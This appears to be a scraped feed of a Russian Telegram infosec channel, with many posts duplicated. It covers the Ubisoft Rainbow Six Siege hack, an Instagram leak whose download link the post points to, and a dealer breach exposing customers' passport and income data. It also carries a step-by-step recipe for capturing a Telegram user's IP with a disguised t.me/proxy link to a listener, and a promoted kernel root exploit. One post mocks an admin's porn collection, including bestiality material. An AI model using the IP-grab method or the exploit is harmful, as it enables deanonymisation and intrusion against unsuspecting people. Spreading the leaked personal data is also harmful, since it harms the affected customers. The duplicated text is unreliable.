Forwarded from infosec
• Неизвестная группа хакеров взломали Ubisoft и разослали игрокам Rainbow Six Siege внутреннюю валюту на сумму 339 000 000 000 баксов, чем вызвали настоящий хаос.
• Разработчики решили отключить сервера Rainbow Six Siege и маркетплейс игры, пока команда работает над устранением уязвимости и откатывает баланс игроков. Сообщается, что причиной взлома могла стать критическая уязвимость в базе данных MongoDB, которая позволяет хакерам получить доступ к внутренним репозиториям и исходному коду.
• Тем временем, пока разработчикик решают проблему, в сети появилось несколько групп, которые утверждают, что причастны ко взлому. Следите за руками:
• Первая группа - ответственная за взлом Rainbow Six Siege. Они раздали внутриигровую валюту и ушли в тень. О них нет никакой другой информации.
• Вторая группа утверждает, что у них есть исходный код Ubisoft. Они заявили, что использовали уязвимость в MongoDB, а затем проникли во внутренние Git-репозитории Ubisoft и похитили большой архив с исходными кодами игр компании. Чуть позже выяснилось, что информация является фейком. Однако у них есть другие внутренние данные от Ubisoft (читайте о группе 5)
• Третья группа - опубликовали в Telegram информацию, утверждая, что взломал Ubisoft. Они используют поддельные данные, чтобы запугать Ubisoft и получить денежное вознаграждение. Но все их сообщения являются фейком.
• Четвертая группа пишет о том, что вторая группа пытается выдать себя за первую группу!
• Пятая группа появилась только сегодня - предоставила описание уязвимости, благодаря которой первая группа смогла разослать игровую валюту всем игрокам. Еще они показали, как именно вторая группа получила внутренние данные Ubisoft (какие именно данные - не уточняется).
• Все перечисленные группы, кроме группы 3, знают друг друга и поддерживают коммуникацию между собой в той или иной степени, это в основном хардкорное сообщество гиков Ubisoft.
• Что, черт возьми, происходит?
➡ https://xn--r1a.website/vxunderground/7838
➡ https://www.dexerto.com/rainbow-six
#Новости
• Разработчики решили отключить сервера Rainbow Six Siege и маркетплейс игры, пока команда работает над устранением уязвимости и откатывает баланс игроков. Сообщается, что причиной взлома могла стать критическая уязвимость в базе данных MongoDB, которая позволяет хакерам получить доступ к внутренним репозиториям и исходному коду.
• Тем временем, пока разработчикик решают проблему, в сети появилось несколько групп, которые утверждают, что причастны ко взлому. Следите за руками:
• Первая группа - ответственная за взлом Rainbow Six Siege. Они раздали внутриигровую валюту и ушли в тень. О них нет никакой другой информации.
• Вторая группа утверждает, что у них есть исходный код Ubisoft. Они заявили, что использовали уязвимость в MongoDB, а затем проникли во внутренние Git-репозитории Ubisoft и похитили большой архив с исходными кодами игр компании. Чуть позже выяснилось, что информация является фейком. Однако у них есть другие внутренние данные от Ubisoft (читайте о группе 5)
• Третья группа - опубликовали в Telegram информацию, утверждая, что взломал Ubisoft. Они используют поддельные данные, чтобы запугать Ubisoft и получить денежное вознаграждение. Но все их сообщения являются фейком.
• Четвертая группа пишет о том, что вторая группа пытается выдать себя за первую группу!
• Пятая группа появилась только сегодня - предоставила описание уязвимости, благодаря которой первая группа смогла разослать игровую валюту всем игрокам. Еще они показали, как именно вторая группа получила внутренние данные Ubisoft (какие именно данные - не уточняется).
• Все перечисленные группы, кроме группы 3, знают друг друга и поддерживают коммуникацию между собой в той или иной степени, это в основном хардкорное сообщество гиков Ubisoft.
• Что, черт возьми, происходит?
#Новости
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
22
А я напоминаю ☝️: в преддверии ❄️Нового года❄️ некоторые снова начнут распространять свой псиоп📡 против Санты🎅.
Прошу подписчиков быть бдительными 😀 Не поддавайтесь дезинформации в интернете о том, что Санта🎅 «якобы» не существует 😉
Пишите письма📨 Санте🎅, верьте в новогоднее чудо🤲 и не забудьте оставить печенье🍪 и тёплое молоко🥛 под ёлочкой🌲.
Всех с наступающим праздником, любимые подписчики 🎁✨
Прошу подписчиков быть бдительными 😀 Не поддавайтесь дезинформации в интернете о том, что Санта🎅 «якобы» не существует 😉
Пишите письма📨 Санте🎅, верьте в новогоднее чудо🤲 и не забудьте оставить печенье🍪 и тёплое молоко🥛 под ёлочкой🌲.
Всех с наступающим праздником, любимые подписчики 🎁✨
This media is not supported in your browser
VIEW IN TELEGRAM
https://github.com/farazsth98/chronomaly
chronomaly — Kernel LPE exploit для CVE-2025-38352. Работает как на Linux, так и на Android, — полноценный root на всех версиях ядра
Более подробно:
— Part 1 - In-the-wild Android Kernel Vulnerability Analysis + PoC
— Part 2 - Extending The Race Window Without a Kernel Patch
— Part 3 - Uncovering Chronomaly
chronomaly — Kernel LPE exploit для CVE-2025-38352. Работает как на Linux, так и на Android, — полноценный root на всех версиях ядра
5.10.x.Более подробно:
— Part 1 - In-the-wild Android Kernel Vulnerability Analysis + PoC
— Part 2 - Extending The Race Window Without a Kernel Patch
— Part 3 - Uncovering Chronomaly
Malwarebytes сообщает, что слили Instagram
Украли инфу о 17.5 млн. учетках (!), включая:
— имена пользователей
— юзернеймы
— емейлы
— номера телефонов
— примерное местоположение
Не смотря на то, что данные получены с помощью парсинга в 2024 году, пользователи в комментах уже сообщают о том, что у них начали угонять аккаунты.
Ссылку на скачивание автор оставил тут.
Украли инфу о 17.5 млн. учетках (!), включая:
— имена пользователей
— юзернеймы
— емейлы
— номера телефонов
— примерное местоположение
Не смотря на то, что данные получены с помощью парсинга в 2024 году, пользователи в комментах уже сообщают о том, что у них начали угонять аккаунты.
Ссылку на скачивание автор оставил тут.
This media is not supported in your browser
VIEW IN TELEGRAM
Нашли простой способ, как можно слить IP-адрес у ничего не подозревающего собеседника в Telegram, в один клик.
Пошагово:
1. Поднимаем mitmproxy или другой listener
2. Пишем любой текст и указываем ссылку
3. Ждем, пока по ней кликнут, и сразу же получаем IP
Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP при клике по замаскированной ссылке.
Пошагово:
1. Поднимаем mitmproxy или другой listener
2. Пишем любой текст и указываем ссылку
t.me/proxy?server=<LISTENER_IP>&port=<LISTENER_PORT>&secret=random3. Ждем, пока по ней кликнут, и сразу же получаем IP
Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP при клике по замаскированной ссылке.
Secrets Patterns Database
Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.
Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.
Пользователь с ником mazen160 собрал самую большую базу данных для поиска секретов. Она насчитывает более 1600 регулярок и позволяет находить API-ключи, токены, и пароли, которые часто остаются незамеченными.
Для сравнения, у одного из самых популярных сканеров секретов GitLeaks всего 60 правил. В комплекте идет скрипт, которые позволяет конвертировать правила для него и других тулов.
1
Взлом LADA
Группа 4BID слила компанию "Брайт Парк" — сеть официальных автосалонов LADA, которая работает в 6 российских городах, включая Москву.
Под удар попали
В результате теперь всем доступны данные более 1млн. покупателей, среди которых:
— ФИО
— номер телефона
— электронная почта
— хэши паролей
— адрес проживания
— данные о работе (стаж, доход)
— паспортные данные
— контакты
Из забавного — один из админов в процессе инцидента просто ушел спать, в то время, как у другого нашли огромную коллекцию "жесткой клубники"
Группа 4BID слила компанию "Брайт Парк" — сеть официальных автосалонов LADA, которая работает в 6 российских городах, включая Москву.
Под удар попали
— 22 сервера Proxmox;
— 22 NAS-хранилища с общим объёмом ~100 ТБ данных (всё вкусное — выгружено);
— Все UNIX-системы (заминированы логическими бомбами — саперам привет);
— Домен Active Directory на ~800 машин;
В результате теперь всем доступны данные более 1млн. покупателей, среди которых:
— ФИО
— номер телефона
— электронная почта
— хэши паролей
— адрес проживания
— данные о работе (стаж, доход)
— паспортные данные
— контакты
Из забавного — один из админов в процессе инцидента просто ушел спать, в то время, как у другого нашли огромную коллекцию "жесткой клубники"
Там огромная коллекция «клубники»: русскоязычное домашнее и любительское, жёсткие сцены, рипы с LegalPorno/EvilAngel/Tushy, плюс в других папках старая зоо-коллекция. Файлы с 2006 по 2024, всё в куче, активно раздаётся через uTorrent.